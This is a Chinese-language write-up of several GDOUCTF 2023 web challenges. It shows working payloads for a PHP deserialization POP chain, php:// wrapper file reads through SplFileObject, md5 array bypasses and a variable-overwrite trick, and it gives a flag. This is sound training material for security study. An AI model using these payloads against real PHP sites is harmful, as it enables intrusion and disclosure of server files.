NSSCTF-GDOUCTF 2023新生赛
[GDOUCTF 2023]hate eat snake
考察:js代码审计
打开题目,发现需要坚持60秒,那么简单的一个思路就是修改得分的变量>60即可
办法1:修改变量
右键查看源代码,之后发现有一个snake.js的文件,ctrl+f搜索if,发现判断过关的条件是getScore>60
搜索发现getScore在Snake.prototype中
在控制台执行
payload
Snake.prototype.getScore = () => 61
控制台开始调用函数
在游戏界面再按一下空格,得到flag
方法2: 先玩游,得到分数后在放着界面停留60秒,再按空格,获取flag
[GDOUCTF 2023]泄露的伪装
考察:目录扫描,php伪协议
由于环境打不开了,我就根据别人的wp提供下思路
思路:打开题目---->>>目录扫描(rar文件下载)--->>>代码审计--->>>php伪协议(input,data)
get参数为?cxk=php://input
post参数为ctrl或者使用下面一种
?cxk=data://text/plain,ctrl
[GDOUCTF 2023]反方向的钟
考察:反序列化,原生类SplFileObject
打开题目,发现一大串代码,看到类了,猜测考察反序列化,需要构造poc链
<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{public $name;public $rank;private $salary;public function __construct($name,$rank,$salary = 10000){$this->name = $name;$this->rank = $rank;$this->salary = $salary;}
}class classroom{public $name;public $leader;public function __construct($name,$leader){$this->name = $name;$this->leader = $leader;}public function hahaha(){if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){return False;}else{return True;}}
}class school{public $department;public $headmaster;public function __construct($department,$ceo){$this->department = $department;$this->headmaster = $ceo;}public function IPO(){if($this->headmaster == 'ong'){echo "Pretty Good ! Ctfer!\n";echo new $_POST['a']($_POST['b']);}}public function __wakeup(){if($this->department->hahaha()) {$this->IPO();}}
}if(isset($_GET['d'])){unserialize(base64_decode($_GET['d']));
}
?>分析:
能利用原生类SplFileObject读取文件
找到最核心的IPO(),关键点new $_POST[‘a’] ($_POST[‘b’])
可以POST请求利用原生类读取文件获得flag(base64编码)
步骤:
要执行IPO(),看到__wakeup()下,要先执行hahaha()
再找到hahaha()所在的类为classroom,要使返回为真,三个变量赋值得为对应的值,leader指向name和rank的值,也就说明$leader=new teacher(),发现name和rank是在teacher类那里
构造poc链
<?php
class teacher{public $name='ing';public $rank='department';private $salary;
}class classroom{public $name='one class';public $leader;
}class school{public $department;public $headmaster='ong';
}$a=new school();
$a->department=new classroom();
$a->department->leader=new teacher();
echo base64_encode(serialize($a));
Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9
之后利用原生类SplFileObject读取文件
a为类,b用php协议读取flag.php /代码中说了flag在flag.php中
所以POST的payload为:
a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php
进行访问
得到base64编码,我们再进行解码得到flag
<?php
$flag = "NSSCTF{c18adac3-acf0-4efa-ab63-10279c78c08d}";
?>[GDOUCTF 2023]受不了一点
考察:md5绕过,强/弱类型比较,变量覆盖
打开题目,得到源码
<?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){$b=$_POST['ctf'];$a=$_POST['gdou'];if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){if(isset($_COOKIE['cookie'])){if ($_COOKIE['cookie']=='j0k3r'){if(isset($_GET['aaa']) && isset($_GET['bbb'])){$aaa=$_GET['aaa'];$bbb=$_GET['bbb'];if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){$give = 'cancanwordflag';$get ='hacker!';if(isset($_GET['flag']) && isset($_POST['flag'])){die($give);}if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){die($get);}foreach ($_POST as $key => $value) {$$key = $value;}foreach ($_GET as $key => $value) {$$key = $$value;}echo $flag;}else{echo "洗洗睡吧";}}else{echo "行不行啊细狗";}}
}
else {echo '菜菜';
}
}else{echo "就这?";
}
}else{echo "别来沾边";
}
?>
别来沾边初步分析,我们需要进行四组绕过
if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b))这里我们需要进行md5绕过,并且为强类型比较绕过,我们可以考虑用数组绕过,也可以用md5碰撞进行绕过
md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 例如 a[]=1&b[]=2
gdou[]=1&ctf[]=2
//绕过第一步这里为简单的cookie赋值,我们用火狐浏览器的hackbar插件就能修改cookie的值
if ($_COOKIE['cookie']=='j0k3r'这里为弱比较类型的绕过,我们可以用小数点进行绕过 ,也可以后面加字符进行绕过
if($aaa==114514 && $bbb==114514 && $aaa!=$bbb构造payload
aaa=114514&bbb=114514.a接着下面这里考察的是变量覆盖
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){die($get);}foreach ($_POST as $key => $value) {$$key = $value;}foreach ($_GET as $key => $value) {$$key = $$value;}echo $flag;直接构造payload,变色的变量可以改变,但与后面的需要相同
123=flag&flag=123最后抓包构造所有的payload
POST /?aaa=114514&bbb=114514a&123=flag&flag=123post参数
gdou[]=1&ctf[]=2
[GDOUCTF 2023]EZ WEB
考察:http协议
由于环境开启不了,看了下别人的wp,讲讲思路
思路:右键查看网页源代码--->>>访问有关于flag的路由--->>>BP抓包修改请求方式为POST